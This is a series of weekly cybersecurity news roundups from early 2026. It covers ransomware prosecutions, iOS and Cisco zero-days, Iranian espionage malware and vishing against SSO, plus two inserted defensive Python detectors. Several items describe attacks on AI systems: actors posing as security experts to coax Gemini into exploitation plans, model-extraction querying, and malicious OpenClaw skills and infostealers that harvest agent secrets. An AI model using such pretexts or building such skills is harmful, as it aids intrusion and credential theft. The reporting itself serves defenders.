A Russian national, Evgenii Ptitsyn, has pleaded guilty to wire fraud conspiracy for his role running the Phobos ransomware operation. Since 2020, Phobos has targeted over 1000 organizations worldwide, including schools, hospitals, and government agencies, collecting more than $39 million in ransom payments. Phobos affiliates were responsible for infiltrating victim networks, encrypting data, exfiltrating sensitive files, and paying Ptitsyn a per-deployment fee in exchange for the corresponding decryption keys.

Ptitsyn himself managed ransomware sales, distributed decryption keys, and took a cut of all affiliate payments. He faces up to 20 years in prison; sentencing is scheduled for July 15.

The Bad | Researchers Uncover ‘Coruna’ Exploit Kit Mass Targeting iOS Devices

Multiple threat actors have deployed Coruna, a previously unknown iOS exploit kit containing 23 exploits and five complete exploit chains capable of targeting Apple devices running iOS 13 through iOS 17.2.1.

Researchers first observed parts of the Coruna framework in February 2025 while investigating activity linked to a commercial surveillance vendor. The exploit kit uses a sophisticated JavaScript delivery framework that fingerprints a victim’s device and operating system before selecting the most effective exploit chain.

Several of the exploits rely on advanced techniques such as WebKit remote code execution (RCE), pointer authentication code (PAC) bypasses, sandbox escapes, kernel privilege escalation, and Page Protection Layer (PPL) bypasses. Some vulnerabilities included in the kit were previously associated with Operation Triangulation, a high-profile iOS espionage campaign uncovered in June 2023.

Coruna exploit chain delivered on iOS 15.8.5 (Source: GTIG)

Over time, Coruna has spread across different threat ecosystems. In mid-2025, a suspected Russian espionage group, UNC6353, used the framework in watering hole attacks targeting visitors to compromised Ukrainian websites. Later that year, the exploit kit appeared on fake Chinese cryptocurrency and gambling websites linked to a financially motivated threat actor.

Once exploitation succeeds, attackers deploy a loader known as PlasmaLoader, which downloads additional modules designed primarily to steal cryptocurrency wallet data and sensitive information. Targeted data includes wallet recovery phrases, financial information, and other stored text. Stolen data is encrypted before being transmitted to attacker-controlled infrastructure.

Coruna demonstrates how advanced spyware-grade exploit frameworks can spread from surveillance vendors to nation-state actors and eventually cybercriminal groups, highlighting the growing commercialization and reuse of sophisticated zero-day capabilities in the mobile threat landscape.

The Ugly | Hacktivists Launch Retaliatory Cyberattacks After U.S.–Israel Strikes on Iran

Following the U.S.-Israel military operations against Iran, cybersecurity researchers are flagging a spike in retaliatory hacktivist activity codenamed ‘Epic Fury’ and ‘Roaring Lion’. The surge has primarily taken the form of distributed denial-of-service (DDoS) attacks, data leaks, and online disruption targeting both government and critical infrastructure organizations.

A new report describes how three main hacktivist groups, Keymous+, DieNet, and NoName057(16), have been responsible for nearly 70% of observed attack activity between February 28 and March 2, 2026. The first recorded attack during this period was launched by Hider Nex (aka Tunisian Maskers Cyber Force), a pro-Palestinian hacktivist collective that combines DDoS attacks with data breaches to support geopolitical messaging.

Hider Nex claiming the first DDoS attack on Telegram (source: Radware)

In total, researchers recorded 149 DDoS attacks targeting 110 organizations across 16 countries, carried out by 12 hacktivist groups. The majority of attacks focused on the Middle East, with 107 incidents targeting regional organizations. Government entities were the most affected sector, accounting for nearly 48% of the victims, followed by organizations in financial services and telecommunications.

Several other cyber threats have emerged alongside the hacktivist campaigns. Pro-Russian groups are claiming breaches of Israeli military networks, while threat actors are running an active SMS phishing campaign that distributes malware disguised as an Israeli civil defense alert app. Iranian state-linked actors associated with the Islamic Revolutionary Guard Corps (IRGC) have reportedly targeted regional energy and digital infrastructure, striking major oil refineries and data centers in the U.A.E.

Iranian-aligned cyber actors have historically blended espionage, disruption, and influence operations during geopolitical crises, suggesting that broader targeting of government, infrastructure, financial, and technology sectors could extend well beyond the region.

The Good, the Bad and the Ugly in Cybersecurity – Week 9

27 February 2026, 11:00

The Good | Authorities Arrest Hacktivist & Convict L3Harris Insider for Selling Secrets to Russia

Spanish authorities have arrested four suspected members of “Anonymous Fénix”, a hacktivist group accused of launching distributed denial-of-service (DDoS) attacks against government ministries, political parties, and public institutions in Spain and parts of South America.

According to the Spanish Civil Guard, the group intensified its operations after the deadly Valencia floods in October 2024, blaming officials for the disaster. The suspects allegedly used X and Telegram to spread anti-government propaganda and recruit volunteers. Courts have since shut down the group’s social media accounts and messaging channels as part of a broader crackdown on cybercrime networks.

In the U.S., a former executive at defense contractor L3Harris Technologies has been sentenced to over seven years in prison for stealing classified zero-day exploits and selling them to a Russian cyber-weapons broker. Peter Williams, who led the firm’s Trenchant cybersecurity unit, admitted taking at least eight sensitive exploit components between 2022 and 2025, using an external drive and encrypted transfers. He sold the tools, developed exclusively for U.S. and allied intelligence agencies, for millions of dollars in cryptocurrency.

U.S. prosecutors said the theft caused tens of millions in losses and posed a severe national security risk. The broker, Operation Zero, allegedly resells exploits to Russian government and private clients. The Department of the Treasury simultaneously imposed sanctions on the company, its owner Sergey Sergeyevich Zelenyuk, and affiliated entities under a law targeting intellectual property theft by foreign adversaries.

Williams pleaded guilty in October 2025 and was ordered to forfeit cash, cryptocurrency, property, and luxury assets. Insider threats endangering national defense capabilities continue to rise, and officials warn that trafficking in offensive cyber tools has become a lucrative global black market.

The Bad | ‘MuddyWater’ Actors Launch Operation Across the MENA Region with New Malware

MuddyWater (aka TEMP.Zagros, TA450, G0069), an Iranian state-linked threat actor, has initiated a new cyber campaign dubbed “Operation Olalampo”, which targets organizations and individuals across the Middle East and North Africa (MENA) amid ongoing regional tensions. First observed in January, the operation introduces novel malware variants while maintaining tactics consistent with the group’s past intrusions, according to new research.

The campaign relies heavily on phishing emails carrying malicious Microsoft Office attachments that trigger macro-based infections. Victims are tricked into enabling macros, which deploy novel downloaders GhostFetch and HTTP_VIP. These tools profile compromised systems, evade legacy defenses, and deliver secondary payloads including the novel GhostBackDoor malware, an implant capable of remote command execution, file manipulation, and persistent access. In some cases, attackers deploy legitimate remote administration software to blend malicious activity with normal operations.

Malicious Microsoft Excel file before macros are enabled (Source: Group-IB)

A notable addition is CHAR, another novel Rust-based backdoor controlled through a Telegram bot for command-and-control (C2), enabling attackers to execute commands, exfiltrate data, and launch additional malware. Analysis indicates possible AI-assisted development, reflecting threat actors’ increasing experimentation with generative tools to accelerate malware creation. Researchers also noted infrastructure reuse from late 2025, suggesting sustained operations rather than isolated attacks.

Operation Olalampo points to MuddyWater’s focus on post-exploitation control, including reconnaissance, credential harvesting, and lateral movement. The group has also exploited vulnerabilities in public-facing servers to gain initial access. Security analysts warn that the campaign is a sign of broader plans to target network edge systems and critical sectors to establish long-term footholds, reinforcing concerns about nation-state-backed cyber operations expanding in scope and sophistication across the MENA region.

Defenders are urged to prioritize phishing resistance and monitor for unusual outbound communications to messaging platforms often used as C2 channels.

The Ugly | Attackers Exploit Critical Cisco SD-WAN Flaw to Target National Infrastructure

Cisco has disclosed an active zero-day exploitation of a critical authentication bypass in its Catalyst SD-WAN platform, a maximum-severity flaw that lets remote attackers compromise controllers and insert malicious peers into targeted networks. The flaw, tracked as CVE-2026-20127, affects both on-premises and cloud deployments of SD-WAN Controller, Manager, and Cloud products.

The vulnerability stems from a broken peering authentication mechanism that can be abused with crafted requests. Successful exploitation grants attackers high-privilege internal access, enabling manipulation of network configurations via NETCONF. By adding malicious peers that appear legitimate, adversaries can route traffic, advertise attacker-controlled networks, and pivot deeper into affected environments.

Cisco Talos attributes the campaign, tracked as UAT-8616, to a sophisticated threat actor active since at least 2023. Investigators believe attackers escalated privileges by downgrading to an older version of the software, exploiting an older root-level flaw (CVE-2022-20775), then restoring the original version to evade detection while retaining control. Talos also links the activity to a broader pattern of targeting network edge devices to gain footholds in high-value organizations, including critical national infrastructure (CNI) operators, suggesting possible nation-state backing.

Government agencies warn the threat is global and ongoing. So far, CISA has issued an emergency directive ordering federal agencies to inventory devices, collect forensic evidence, and patch immediately, while the UK’s National Cyber Security Centre urges organizations to report signs of compromise and follow hardening guidance to minimize risk.

Indicators of compromise include suspicious authentication logs, unauthorized SSH keys, rogue accounts, log tampering, and unexplained software downgrades. Authorities also stress that SD-WAN management interfaces should never be internet-exposed and recommend isolating control systems, forwarding logs externally, and applying updates.

The Good, the Bad and the Ugly in Cybersecurity – Week 8

20 February 2026, 14:28

The Good | Law Enforcement Arrest Extortionist, Phobos Affiliate & Financial Scammers

A Dutch man was arrested this week after he allegedly downloaded confidential documents mistakenly shared with him and tried to extort authorities by refusing to delete them without compensation. The man kept the files, prompting a hacking investigation and a search of his home. Authorities say knowingly accessing misdirected, sensitive data constitutes computer trespass and emphasize that recipients must report such mistakes and avoid keeping unauthorized materials.

In Poland, authorities detained an individual tied to the Phobos Ransomware-as-a-Service (RaaS) operation, seizing stolen credentials, credit card data, and server access information. The arrest, part of Europol-coordinated “Operation Aether”, specifically targets the group’s affiliates and infrastructure.

Investigators found files enabling unauthorized system access and confirmed that the suspect communicated with other Phobos actors via encrypted messaging. He now faces charges for producing and distributing hacking tools, which carry up to five years in prison. The international operation is part of a wide effort to disrupt sprawling Phobos ransomware networks and warn potential targets of ongoing and emerging attacks.

A joint effort coordinated by Interpol’s African Joint Operation against Cybercrime (AFJOC) brought together various agencies to arrest 651 suspects and recover over $4.3 million in a coordinated crackdown on investment fraud, mobile money scams, and fake loan schemes. In the operation, tracked as “Operation Red Card 2.0”, law enforcement across 16 countries identified 1247 victims and targeted cybercrime linked to $45 million in losses.

Authorities seized 2341 devices, shut down 1442 malicious sites, and dismantled fraud networks in Nigeria, Kenya, and Côte d’Ivoire. Cross-border cooperation continues to be a key factor in combating organized cybercrime within regions of the world that are still rapidly digitizing.

Source: Interpol

The Bad | CRESCENTHARVEST Targets Protest Supporters in New Espionage Campaign

New research has brought to light a cyber espionage campaign, dubbed “CRESCENTHARVEST”, that targets Farsi-speaking supporters of Iran’s ongoing anti-government protests. Active since early January, the operation uses protest-themed lures to trick victims into launching malware designed for long-term surveillance and data theft.

The attackers distribute malicious archives filled with authentic protest images, videos, and reports in Farsi to appear credible and emotionally compelling, particularly to individuals seeking updates during internet blackouts and restricted media coverage.

Source: Acronis

Inside the archive are Windows shortcut files disguised as media using double extensions such as *.jpg.lnk and *.mp4.lnk. When opened, the file runs PowerShell commands to download additional payloads while displaying a harmless image or video to avoid suspicion. The infection chain then leverages a legitimate, signed system binary to sideload rogue libraries, ultimately installing a previously undocumented remote access trojan (RAT) that doubles as an information stealer.
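A defender-side check for the disguise described above, added here as an example and not code from the Acronis research or SentinelOne: it inspects archive entries in memory for media-named `.lnk` files and for shell-link content regardless of name. The archive it builds is constructed; the header bytes are those of the Windows Shell Link format.

```python
"""Flag archive entries that use the double-extension trick (photo.jpg.lnk,
clip.mp4.lnk) described in the CRESCENTHARVEST write-up. Added example, not
Acronis' or SentinelOne's code; the archive contents below are constructed."""
import io
import zipfile
from typing import List

# Extensions a user expects to be harmless media. A name that looks like one
# of these but really ends in .lnk is a Windows shortcut in disguise.
MEDIA_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif", ".mp4", ".mov", ".pdf"}
SHORTCUT_EXTENSION = ".lnk"

# Windows shell link files start with HeaderSize 0x4C followed by the
# ShellLink CLSID; checking the magic catches .lnk files renamed to anything.
LNK_MAGIC = b"\x4c\x00\x00\x00\x01\x14\x02\x00"


def is_disguised_shortcut(name: str) -> bool:
    """True when the file name ends with <media ext>.lnk, e.g. 'clip.mp4.lnk'."""
    lower = name.lower()
    if not lower.endswith(SHORTCUT_EXTENSION):
        return False
    stem = lower[: -len(SHORTCUT_EXTENSION)]
    return any(stem.endswith(ext) for ext in MEDIA_EXTENSIONS)


def is_lnk_content(data: bytes) -> bool:
    """True when the bytes start with the shell-link header, whatever the name."""
    return data[: len(LNK_MAGIC)] == LNK_MAGIC


def scan_archive(archive_bytes: bytes) -> List[str]:
    """Return names of entries that are disguised shortcuts, by name or by
    content. Entries are read in memory; nothing is extracted to disk."""
    findings: List[str] = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as entry:
                head = entry.read(len(LNK_MAGIC))
            if is_disguised_shortcut(info.filename) or is_lnk_content(head):
                findings.append(info.filename)
    return findings


def build_sample_archive() -> bytes:
    """Constructed archive mimicking the lure layout: a real-looking image,
    two shortcuts hiding behind media extensions, and one renamed shortcut."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("protest_photos/crowd_01.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 32)
        zf.writestr("protest_photos/crowd_02.jpg.lnk", LNK_MAGIC + b"\x00" * 64)
        zf.writestr("videos/march.mp4.lnk", LNK_MAGIC + b"\x00" * 64)
        # No .lnk suffix at all: caught only by the content check.
        zf.writestr("report.pdf", LNK_MAGIC + b"\x00" * 64)
        zf.writestr("README.txt", b"Images and reports from the protests.\n")
    return buf.getvalue()


if __name__ == "__main__":
    for hit in scan_archive(build_sample_archive()):
        print("disguised shortcut:", hit)
```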

Once deployed, the malware can execute commands, log keystrokes, capture browser credentials, harvest cookies, extract Telegram data, and collect extensive system information. It also identifies installed security tools, allowing the actors to adjust their behavior to remain undetected. The researchers say communication with command-and-control (C2) servers blends into normal web traffic, enabling persistent espionage.

Although the campaign is currently unattributed, the tactics and targeting strongly suggest alignment with Iranian state-backed interests. Researchers believe attackers likely relied on spearphishing or prolonged social engineering, sometimes building up relationships with targets over extended periods before delivering the malicious files.

The operation reflects a broader pattern of politically motivated digital surveillance aimed at journalists, activists, researchers, and diaspora communities, as attackers continue to piggyback on the turbulence of geopolitical crises.

The Ugly | Infostealers Exfiltrate OpenClaw AI Assistant’s Operational Secrets

The rapid rise of OpenClaw, a locally running agentic AI assistant, has introduced a new class of security risk: malware that targets the assistant itself. Because the framework stores persistent memory, configuration data, and authentication material on the user’s device, it effectively becomes a vault of API keys, tokens, private keys, and sensitive personal context. Security researchers have now observed infostealing malware exfiltrating these files (openclaw.json, device.json, and soul.md) in real-world infections, marking a move from traditional credential theft techniques toward hijacking the inherent identities and capabilities of autonomous agents.

Directory structure on infected machine showing exfiltrated OpenClaw configuration files (Source: Hudson Rock)

In this first in-the-wild instance, the malware did not exploit a vulnerability in the assistant. Instead, it used broad file-harvesting techniques that scan systems for keywords such as “token” and “private key”. This approach allows attackers to capture critical configuration files, including those that enable remote connections, device impersonation, and access to encrypted logs or cloud services. The stolen data could permit full takeover of the agent’s functions, effectively granting bad actors the same authority the assistant holds across email, apps, and online platforms.

Researchers warn that as agentic assistants become embedded in professional workflows, attackers will increasingly develop specialized tooling to parse these environments and weaponize them. Additional findings on this growing attack surface include exposed instances vulnerable to remote code execution (RCE) and supply chain risks in community “skill” repositories.

In response to these emerging risks, Prompt Security from SentinelOne has introduced ClawSec and OneClaw, designed specifically for the agentic era to provide deep visibility into autonomous agent behavior and harden them from within. These tools help organizations monitor, control, and secure personal AI assistants such as OpenClaw, Nanobot, and Picoclaw before compromised agents can be leveraged as trusted insiders.

The Good, the Bad and the Ugly in Cybersecurity – Week 7

13 February 2026, 15:05

The Good | Authorities Crack Down on Identity, Romance Baiting & Phishing Schemes

Two individuals have been indicted for a years-long scheme that used stolen identities from 3,000 victims to siphon $3 million from sportsbooks. Amitoj Kapoor and Siddharth Lillaney allegedly bought personally identifying information (PII) on dark markets and Telegram, opened thousands of fake accounts on FanDuel, DraftKings, and BetMGM, and harvested new-user bonuses.

The pair allegedly used background-check services to pass verification checks and cashed out winnings via prepaid cards into accounts they controlled. Prosecutors have filed fraud, identity theft, and money laundering charges that together carry sentences of several decades in prison.

Source: Madison County Detention Center

In further crackdowns on fraudulent schemes, a dual Chinese and St. Kitts & Nevis fugitive has been sentenced in absentia to 20 years for orchestrating a romance baiting crypto scam worth over $73 million.

Daren Li built trust with victims via messaging and dating apps before steering them into fake investments, then laundering the stolen funds through shell companies, U.S. bank accounts, and cryptocurrency platforms using assets like Tether. Arrested in 2024, Li fled two months ago while awaiting sentencing. Investigators tied the syndicate to hundreds of millions in laundered crypto and wider global losses.

Police in the Netherlands have arrested a man for allegedly selling access to JokerOTP, a phishing-as-a-service (PhaaS) tool that intercepts one-time passwords to hijack accounts. The suspect, the third arrest in a three-year-long probe, allegedly marketed licenses via Telegram to criminals who used automated calls to impersonate trusted companies and trick victims into revealing codes and sensitive data.

Authorities say the service enabled over 28,000 attacks across 13 countries, causing roughly $10 million in losses and targeting accounts on PayPal, Venmo, Coinbase, and Apple. While investigations continue, dozens of JokerOTP bot buyers have already been identified and face prosecution in due time.

The Bad | APT Groups Weaponize Google Gemini in All Stages of Cyber Kill Chain

State-backed hackers and cybercriminals are increasingly exploiting Google’s Gemini AI to streamline their attacks from initial reconnaissance to post-compromise operations. According to new research, actors linked to China, Iran, North Korea, and Russia used the model for target profiling, phishing lure generation, translation, coding, vulnerability testing, command-and-control development, and data exfiltration.

Some operatives even posed as cybersecurity experts to trick the AI tool into producing detailed exploitation plans, including remote code execution (RCE) and web application firewall (WAF) bypass techniques against specific targets in the U.S.

Model extraction attack (Source: GTIG)

Iranian-linked threat group APT42 leveraged the model to accelerate social engineering campaigns and tailor malicious tools, while others integrated AI-assisted capabilities into malware such as a CoinBait phishing kit and HonestCue malware launcher. Criminal groups also used generative AI in ClickFix campaigns that delivered infostealing malware through deceptive troubleshooting ads. Researchers also noted signs of AI-generated code in malware artifacts, indicating that generative platforms are already shaping attacker toolchains.

Beyond direct abuse, the report observed attempts to extract and replicate Gemini itself through large-scale querying and “knowledge distillation” techniques, in which actors use data from one model to train fresh, more advanced ones. While this mostly threatens AI vendors’ intellectual property, it could also eventually affect end users of the tool as AI-as-a-Service continues to rise.

Google says it has disabled the malicious accounts and continues to harden its defenses to limit misuse and make it more difficult to exploit. However, researchers warn that AI integration will likely accelerate threat actor capabilities across cybercrime ecosystems, lowering barriers to entry and increasing the speed, scale, and sophistication of future attacks.

The Ugly | China-Based Actors Hit Major Singaporean Telcos in Ongoing Espionage Campaign

Singapore’s Cyber Security Agency (CSA) revealed this week that the China-linked threat actor UNC3886 has targeted each of the country’s four largest telecommunications (telco) providers – Singtel, StarHub, M1, and Simba Telecom – at least once last year.

Using sophisticated tools and zero-day exploits, the APT gained limited access to critical systems. While it did not disrupt services or exfiltrate sensitive customer data, rootkits helped UNC3886 maintain stealthy persistence while siphoning technical data to support operational objectives.

Source: AsiaOne

CSA has since responded with “Operation Cyber Guardian”, an 11-month campaign bringing together over 100 investigators from six government agencies. Authorities closed access points in the telco networks, expanded monitoring, and blocked attempts to pivot into banking, transport, or healthcare networks. The agency also emphasized that while UNC3886’s intrusions were deliberate and well-planned, mitigation measures were able to prevent major disruption.

Active since at least 2022, the PRC-based actor is known to target virtualization technologies and edge devices, often fabricating scenarios to test and exploit vulnerabilities without triggering alerts. Previous activity included targeting telecommunications networks in the U.S. and Canada with the goal of developing cross-border espionage capabilities.

CSA described UNC3886 as “an advanced persistent threat with deep capabilities”, noting that the recent campaign demonstrates the ongoing risk to critical national infrastructure. The agency stressed the importance of cyber defense readiness, stating that rapid remediation, monitoring, and coordinated response measures continue to be key to containing the attacks and protecting Singapore’s telco sector.

The Good, the Bad and the Ugly in Cybersecurity – Week 6

6 February 2026, 11:00

The Good | Former Google Engineer Steals AI Supercomputing Secrets for China

Former Google software engineer Linwei Ding has been found guilty of economic espionage and trade secret theft after stealing sensitive AI supercomputing information and covertly sharing it with Chinese technology interests.

Source: LinkedIn

Ding was first indicted in March 2024 following an internal Google investigation in which prosecutors say he was dishonest and uncooperative. His conduct ultimately led to his arrest in California. Trial evidence showed that between May 2022 and April 2023, Ding exfiltrated more than 2,000 pages of confidential technical documents from Google and uploaded them to his personal Google Cloud account.

The stolen materials detailed some of Google’s most sensitive AI infrastructure, including proprietary TPU and GPU architectures, large-scale AI workload orchestration software, SmartNIC networking designs, and internal supercomputing system configurations. These assets are the backbone of Google’s ability to train and operate advanced AI models at scale.

While employed at Google, Ding maintained undisclosed relationships with two China-based technology companies and negotiated a senior executive role as chief technology officer at one. Prosecutors showed that Ding told investors he could replicate Google-class AI supercomputing infrastructure.

Evidence presented at trial also linked Ding’s activities to Chinese government-backed initiatives. He applied to a Shanghai-sponsored talent program and stated his intention to help China achieve computing infrastructure on par with other global powers.

The DoJ noted that the jury heard extensive testimony about how such programs are used to advance China’s technological and economic goals. Ding has now been convicted on seven counts each of economic espionage and trade secret theft, offenses that carry potential sentences of 10 to 15 years per count.

The Bad | Vishing Campaigns Hijack SSO to Enable Mass SaaS Data Theft

A surge in ShinyHunters SaaS data theft incidents has been linked to highly targeted voice phishing (vishing) campaigns that combine live phone calls with convincing, company-branded phishing sites.

In these attacks, threat actors impersonate corporate IT or helpdesk staff and contact employees directly, claiming MFA settings need urgent updates. Victims are then guided to fake SSO portals designed to capture credentials and MFA codes.

According to reports released this week from Okta and Mandiant, the attackers used advanced phishing kits that support real-time interaction.

While speaking with the victim, the attacker relays stolen credentials, triggers legitimate MFA challenges, and coaches the employee to approve push notifications or enter one-time passcodes. This enables the attacker to authenticate successfully and enroll their own MFA device, establishing persistent access.

Source: Mandiant

Once inside, attackers pivot through centralized SSO dashboards such as Okta, Microsoft Entra, or Google, exposing the SaaS applications the compromised user has access to. For data theft and extortion groups, SSO access provides a single gateway to broader cloud data exposure.

The activity is being tracked across multiple threat clusters, including UNC6661, UNC6671, and UNC6240 (ShinyHunters). UNC6661 handles the initial compromise and data theft, while ShinyHunters conducts extortion and data leaks. A related cluster, UNC6671, uses similar vishing tactics but different infrastructure and more aggressive pressure techniques.

Investigators observed clear forensic indicators, including PowerShell-based downloads from SharePoint, suspicious Salesforce logins, bulk DocuSign exports, and the abuse of a Google Workspace add-on to delete security alerts and conceal the MFA changes.

Organizations are advised to tighten identity workflows around password resets, MFA changes, and device enrollment, and enable logging and alerts for suspicious sign‑ins, new app connections, and abnormal or high‑volume SaaS data access.
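A detection that strings together the signals from this story (a push-approved sign-in from an IP never seen for that user, a new MFA factor enrolled minutes later, then deletion of security alerts), written as an added example that is not Okta's, Mandiant's or SentinelOne's code; the event schema and the audit trail are constructed and vendor-neutral.

```python
"""Correlate IdP audit events for the vishing chain described above. Added
example; the event types, field names and log entries are constructed and
do not correspond to any vendor's schema."""
from datetime import datetime, timedelta
from typing import Dict, List, Set, Tuple

ENROLL_WINDOW = timedelta(minutes=15)   # suspicious login -> new factor
CLEANUP_WINDOW = timedelta(minutes=60)  # new factor -> alert deletion

# Constructed audit trail, chronological. Day 1 establishes each user's usual
# source IP. On day 2 alice approves a push from an unknown IP, a TOTP factor
# is enrolled six minutes later and security alerts are deleted (the attacker
# pattern). bob enrolls a factor from his known IP (benign phone replacement);
# carol signs in from a new IP but enrolls nothing (travel).
EVENTS: List[Dict[str, str]] = [
    {"ts": "2026-02-02T08:30:00", "type": "login", "user": "alice", "ip": "203.0.113.10", "factor": "push"},
    {"ts": "2026-02-02T08:45:00", "type": "login", "user": "bob", "ip": "198.51.100.7", "factor": "push"},
    {"ts": "2026-02-03T10:02:00", "type": "login", "user": "alice", "ip": "192.0.2.55", "factor": "push"},
    {"ts": "2026-02-03T10:08:00", "type": "mfa_enroll", "user": "alice", "ip": "192.0.2.55", "factor": "totp"},
    {"ts": "2026-02-03T10:40:00", "type": "alert_delete", "user": "alice", "ip": "192.0.2.55"},
    {"ts": "2026-02-03T11:00:00", "type": "login", "user": "bob", "ip": "198.51.100.7", "factor": "push"},
    {"ts": "2026-02-03T11:03:00", "type": "mfa_enroll", "user": "bob", "ip": "198.51.100.7", "factor": "totp"},
    {"ts": "2026-02-03T12:00:00", "type": "login", "user": "carol", "ip": "192.0.2.99", "factor": "push"},
]


def detect_vished_enrollments(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Walk events in order and return one finding per user whose push-approved
    login from a never-seen IP is followed by a factor enrollment inside
    ENROLL_WINDOW. Severity rises to 'high' if that user then deletes security
    alerts inside CLEANUP_WINDOW (the cover-up step reported by investigators)."""
    known_ips: Dict[str, Set[str]] = {}
    suspect_login: Dict[str, Tuple[datetime, str]] = {}
    open_findings: Dict[str, Dict[str, str]] = {}
    findings: List[Dict[str, str]] = []

    for ev in events:
        user, ip = ev["user"], ev["ip"]
        ts = datetime.fromisoformat(ev["ts"])
        seen = known_ips.setdefault(user, set())

        if ev["type"] == "login":
            # Push approval is the step the caller coaches the victim through;
            # a source IP never seen for this user is the second signal.
            if ev.get("factor") == "push" and ip not in seen:
                suspect_login[user] = (ts, ip)
            seen.add(ip)

        elif ev["type"] == "mfa_enroll":
            start = suspect_login.pop(user, None)
            if start is not None and ts - start[0] <= ENROLL_WINDOW:
                finding = {
                    "user": user,
                    "login_ip": start[1],
                    "login_at": start[0].isoformat(),
                    "enrolled_at": ev["ts"],
                    "factor": ev.get("factor", "unknown"),
                    "severity": "medium",
                }
                findings.append(finding)
                open_findings[user] = finding

        elif ev["type"] == "alert_delete":
            finding = open_findings.get(user)
            if finding is not None:
                enrolled_at = datetime.fromisoformat(finding["enrolled_at"])
                if ts - enrolled_at <= CLEANUP_WINDOW:
                    finding["severity"] = "high"

    return findings


if __name__ == "__main__":
    for f in detect_vished_enrollments(EVENTS):
        print(f"{f['severity']}: {f['user']} enrolled {f['factor']} at {f['enrolled_at']} "
              f"after push login from new IP {f['login_ip']} at {f['login_at']}")
```

In production the per-user IP baseline would come from weeks of history rather than the same log slice, and device or ASN identity can replace the raw IP.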

The Ugly | Attackers Flood OpenClaw with Malicious Skills to Steal Data

Over 200 malicious plug-ins, known as “skills”, have been published in under a week for OpenClaw, a rapidly growing open-source personal AI assistant previously called ClawdBot and Moltbot. Discovered across GitHub and OpenClaw’s official registry “ClawHub”, these skills masquerade as legitimate utilities while secretly delivering information-stealing malware.

Source: OpenSourceMalware

The malicious packages impersonate popular tools such as cryptocurrency trackers, financial utilities, and social media content services. In reality, they deploy malware designed to harvest API keys, cryptocurrency wallet data, SSH credentials, browser passwords, cloud secrets, and configuration files. Researchers report that many of the skills are near-identical clones with randomized names, suggesting an automated, large-scale campaign.

The skills include professional-looking documentation that instructs users to install a supposed prerequisite called “AuthTool”. Following these steps then triggers the malware delivery. On macOS, this involves base64-encoded shell commands that download payloads linked to NovaStealer or Atomic Stealer variants, while Windows users are prompted to run password-protected archives containing credential-stealing trojans.

The campaign coincides with the disclosure of a high-severity OpenClaw vulnerability (CVE-2026-25253) that enables one-click remote code execution through token exfiltration and WebSocket hijacking. Although patched in late January 2026, the flaw points to the platform’s growing attack surface.

Researchers warn that OpenClaw’s deep system access, persistent memory, and reliance on third-party skills make it an attractive target for supply chain attacks, reinforcing the need for isolation, restricted permissions, and careful vetting before deployment.

The rapid growth and decentralized nature of OpenClaw deployments mirror trends in unmanaged AI infrastructure, creating a large, publicly exposed attack surface that can be exploited by adversaries at scale. The combination of persistent memory, tool access, and remote capabilities makes these AI assistants particularly vulnerable to automated malware campaigns.

The Good, the Bad and the Ugly in Cybersecurity – Week 5

30 January 2026, 16:37

The Good | U.S. Authorities Charge ATM Hackers, Dismantle Darkmarket, and Seize ‘RAMP’ Forum

A U.S. federal grand jury has charged 31 defendants for their roles in an ATM jackpotting operation linked to Venezuela’s Tren de Aragua gang.

The indictment details 32 counts tied to the use of Ploutus malware to drain ATMs nationwide. After physically accessing the machines, suspects installed preloaded drives or USBs to deploy the malware, erase forensic evidence, and force cash dispensing until empty.

Prosecutors say the operation laundered millions to fund the gang, now officially designated a Foreign Terrorist Organization by U.S. authorities. This action follows two previous indictments from October and December 2025, bringing the total prosecutions to 87.

A Slovakian man has pleaded guilty to running Kingdom Market, a darkmarket that sold drugs, cybercrime tools, fake IDs, and stolen data. Alan Bill (aka Vend0r or KingdomOfficial) admitted conspiring to distribute controlled substances while operating the platform from 2021 to 2023.

During the probe, undercover agents bought fentanyl, methamphetamine, and a fraudulent U.S. passport before authorities seized the site in 2023. The investigation cited tens of thousands of users, crypto-based payments, and Bill’s role as the administrator. Sentencing is scheduled for this May as Bill faces 40 years of imprisonment and a possible $5 million fine.

The FBI has seized the infamous RAMP cybercrime forum, a platform that openly hosted ransomware advertising, malware, and hacking services. Both its Tor and clearnet domains now display an FBI seizure banner, suggesting investigators have access to user data that could expose the forum’s users and all linked threat actors.

The takedown of the 5-year-old forum removes one of the last centralized hubs where ransomware operators could openly advertise or trade access to networks, recruit affiliates, and coordinate at scale.

The Bad | 175,000 AI Systems Exposed Without Security Controls

SentinelLABS and Censys revealed this week a sprawling network of 175,000 open-source AI systems hosted across 130 countries, warning that these exposed systems lack basic security protections like authentication and monitoring that major AI platforms implement by default.

Over 293 days of scanning, researchers identified a persistent core of 23,000 systems generating most activity, with many configured to execute code, access external systems, and process images. The systems are concentrated in cloud services and residential networks, where their IP addresses appear as legitimate household or business traffic, making it difficult to trace malicious activity back to attackers.

The research highlights how attackers could commandeer these unauthenticated systems to generate spam, phishing emails, and disinformation campaigns while appearing to operate from trusted networks. Researchers found at least 201 systems explicitly configured with safety guardrails removed. Because these systems lack authentication, attackers can access them at no cost while victims pay the infrastructure bills.

The researchers say the vast, unmanaged layer of LLMs represents a “governance inversion”: the systems are scattered across thousands of networks, but they all run the same handful of AI models. If one of those models has a vulnerability, it affects thousands of systems at once, but there’s no single entity responsible for securing all those deployments.

Top 20 model families by share of unique hosts

The researchers conclude that those running self-hosted AI systems should secure them with the same authentication, monitoring, and network controls used for other externally accessible infrastructure. However, the research notes that residential deployments require different approaches, as home users aren’t held to the same security requirements as businesses running AI systems on cloud infrastructure.

The Ugly | Newly Patched Microsoft Office Zero-Day Allows Security Feature Bypass

Microsoft has released emergency out-of-band security updates to address a high-severity zero-day vulnerability in Office, tracked as CVE-2026-21509 (CVSS score: 7.8). The flaw is currently being exploited in the wild and affects Office 2016, 2019, LTSC 2021, LTSC 2024, and Microsoft 365 Apps for Enterprise.

CVE-2026-21509 is a security feature bypass flaw that allows attackers to exploit COM/OLE controls in Office. Attackers send malicious files to targets and use social engineering techniques to convince victims to open the documents. The exploit is possible because Office relies on untrusted inputs when processing COM/OLE controls, enabling low-complexity attacks that require no authentication.

